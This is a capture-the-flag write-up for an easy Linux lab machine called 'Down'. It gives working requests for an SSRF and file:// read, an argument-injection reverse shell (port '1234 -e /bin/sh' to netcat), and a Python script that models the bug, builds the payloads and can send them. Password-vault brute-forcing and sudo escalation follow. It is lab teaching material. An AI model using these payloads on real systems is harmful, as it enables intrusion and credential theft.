
Machine (Easy) - Down

Writeup for the Down machine, an easy Linux challenge involving command injection and privilege escalation.

Writeup Author: BobBuilder


Objective: Gain initial access through a web interface vulnerable to command injection, extract user credentials from an encrypted password manager file, and achieve root access via full sudo rights.

Category: Machine
Difficulty: Easy
Platform: Linux
Machine Author: jkr


Enumeration

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
  • HTTP Title: Is it down or just me?
  • Interesting endpoint discovered through testing:
    • /index.php?expertmode=tcp switches the checker into a raw TCP mode that runs netcat against a user-supplied IP and port.

User

Identify Potential LFI and SSRF

The checker fetches whatever URL is submitted in the url parameter, so first attempt SSRF against the loopback interface via POST:

POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

url=http%3A%2F%2F127.0.0.1%2Fserver-status

Test for local file access by appending a second, space-separated URL that uses the file:// scheme. The value lands on a curl command line unquoted, so the space turns it into two URL arguments; curl fetches both, and the file:// one returns the PHP source in the response body:

POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

url=http://127.0.0.1/ file:///var/www/html/index.php

Snippet from index.php

if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
  $ip = trim($_POST['ip']);
  $valid_ip = filter_var($ip, FILTER_VALIDATE_IP);           // ip must parse as an address
  $port = trim($_POST['port']);
  $port_int = intval($port);                                 // "1234 -e /bin/sh" -> 1234
  $valid_port = filter_var($port_int, FILTER_VALIDATE_INT);  // validates the integer, not $port
  if ( $valid_ip && $valid_port ) {
    $rc = 255; $output = '';
    $ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");       // raw $port interpolated; spaces survive

The expertmode=tcp handler validates intval($port) but interpolates the original $port string into the command. escapeshellcmd() backslash-escapes shell metacharacters, so chaining a second command with ; or | is blocked, but it leaves spaces untouched, so anything after the leading number becomes extra arguments to nc:

/usr/bin/nc -vz $ip $port

Exploit: Reverse Shell via Netcat

Start listener:

nc -lvvp 1234

Trigger the reverse shell. The port value still passes the check (intval gives 1234), and the -e that follows is netcat-traditional's "execute after connect" option (the OpenBSD netcat lacks it, but /usr/bin/nc on this box honours it, as the callback below shows). The Content-Type header is required for PHP to populate $_POST:

POST /index.php?expertmode=tcp HTTP/1.1
Content-Type: application/x-www-form-urlencoded

ip=<attacker_ip>&port=1234+-e+/bin/sh

Successful connection:

connect to [me] from (UNKNOWN) [<down_ip>] 37804

Read user flag:

cat user_<REDACTED>.txt
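The steps above can be traced offline. The script below is an added example for this writeup, not code from the target or from the machine author: it re-implements the checks seen in index.php (intval, FILTER_VALIDATE_IP, escapeshellcmd) in Python, shows the argv that nc actually receives for the injected port value next to a hardened variant, and builds the request bodies for both the file:// read and the reverse shell with the standard library. The attacker address 10.10.14.5 and listener port 1234 are placeholders, and the post() helper only touches the network when you run it against a real target.

```python
"""Offline model of the Down checker's expertmode=tcp handler and the
argument injection used in this writeup.  Added example, not the target's
own code: the PHP checks from index.php are re-implemented in Python so the
bypass can be traced without a target.  10.10.14.5 and 1234 are placeholders.
"""
import ipaddress
import re
import shlex
import urllib.request
from urllib.parse import urlencode

# Characters PHP's escapeshellcmd() prefixes with a backslash.  Space is
# deliberately absent: it is not a metacharacter, only an argument separator.
_SHELL_META = set('#&;`|*?~<>^()[]{}$\\\n\xff\'"')


def php_intval(value: str) -> int:
    """Approximate PHP intval() on a string: optional sign plus leading digits,
    everything after the digits is ignored, no digits at all gives 0."""
    m = re.match(r'\s*([+-]?\d+)', value)
    return int(m.group(1)) if m else 0


def php_escapeshellcmd(command: str) -> str:
    """Approximate PHP escapeshellcmd(): metacharacters get a backslash, spaces
    pass through untouched.  (Real PHP leaves paired quotes alone; this
    simplification escapes every quote, which is enough for these payloads.)"""
    return ''.join('\\' + c if c in _SHELL_META else c for c in command)


def _validate(ip: str, port: str):
    """The two checks index.php performs.  The port check looks at
    intval($port), not at the $port string that is later interpolated."""
    ip, port = ip.strip(), port.strip()
    try:
        ipaddress.ip_address(ip)          # filter_var($ip, FILTER_VALIDATE_IP)
    except ValueError:
        return None
    port_int = php_intval(port)           # intval($port)
    if port_int == 0:                     # filter_var(0, FILTER_VALIDATE_INT) is falsy
        return None
    return ip, port, port_int


def nc_argv_vulnerable(ip: str, port: str):
    """Mirror of the original: builds the nc command line with the raw $port
    string and returns the argv the shell would actually hand to nc."""
    checked = _validate(ip, port)
    if checked is None:
        return None
    ip, raw_port, _ = checked
    cmd = php_escapeshellcmd(f"/usr/bin/nc -vz {ip} {raw_port}")
    return shlex.split(cmd)               # POSIX word splitting, escapes removed


def nc_argv_fixed(ip: str, port: str):
    """Hardened variant: use the validated integer and pass argv directly
    (e.g. proc_open() with an array), so user input can never add arguments."""
    checked = _validate(ip, port)
    if checked is None:
        return None
    ip, _, port_int = checked
    if not 1 <= port_int <= 65535:
        return None
    return ["/usr/bin/nc", "-vz", ip, str(port_int)]


def file_read_body(path: str) -> str:
    """Body for the file:// read: a second, space-separated URL rides along
    in the same unquoted curl argument (the behaviour observed in the writeup)."""
    return urlencode({"url": f"http://127.0.0.1/ file://{path}"})


def reverse_shell_body(attacker_ip: str, lport: int) -> str:
    """Body for POST /index.php?expertmode=tcp: port keeps intval() == lport
    while smuggling '-e /bin/sh' as extra nc arguments."""
    return urlencode({"ip": attacker_ip, "port": f"{lport} -e /bin/sh"})


def post(url: str, body: str, timeout: float = 10.0) -> bytes:
    """Send one form POST; only used when run against a real target."""
    req = urllib.request.Request(
        url, data=body.encode(), method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    target = "http://<down_ip>"          # placeholder; replace before running
    print(nc_argv_vulnerable("10.10.14.5", "1234 -e /bin/sh"))
    print(nc_argv_vulnerable("10.10.14.5", "1234; id"))   # chaining is escaped
    print(nc_argv_fixed("10.10.14.5", "1234 -e /bin/sh"))
    # With a listener running (nc -lvvp 1234), uncomment to fire the exploit:
    # post(f"{target}/index.php?expertmode=tcp", reverse_shell_body("10.10.14.5", 1234))
```

Running it prints nc's argv for the injected value (the listener address, the port, then -e and /bin/sh as separate words) against the single validated port the hardened variant would pass, and shows that a ; injection survives only as a literal part of the port word, which is why argument injection rather than command chaining is the working route here.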

Root

Discover Sensitive Files

Run linpeas.sh and look for interesting files:

/home/aleks/.local/share/pswm/pswm

Contents:

<Base64 Encrypted PSWM content>

Decrypt Stored Credentials

The vault is encrypted with the cryptocode library, keyed by the master password, so the practical route is to brute-force that password with a wordlist. Copy the pswm file to the attacker machine and use the following decoder:

  • https://github.com/repo4Chu/pswm-decoder

Run the decoder against the copied vault file:

python3 exploit.py

Output (one entry per line: alias, username, password; the pswm alias is the manager's own record of the master password):

pswm    aleks    <REDACTED>

The same password works for the aleks system account. Log in with it over SSH, or switch user from the reverse shell (su needs a terminal, so upgrade the shell to a pty first):

ssh aleks@<down_ip>
# or if already in shell:
su aleks

Check sudo permissions

sudo -l

Output:

(ALL : ALL) ALL

Easy: aleks may run any command as any user with the password just recovered, so become root

sudo su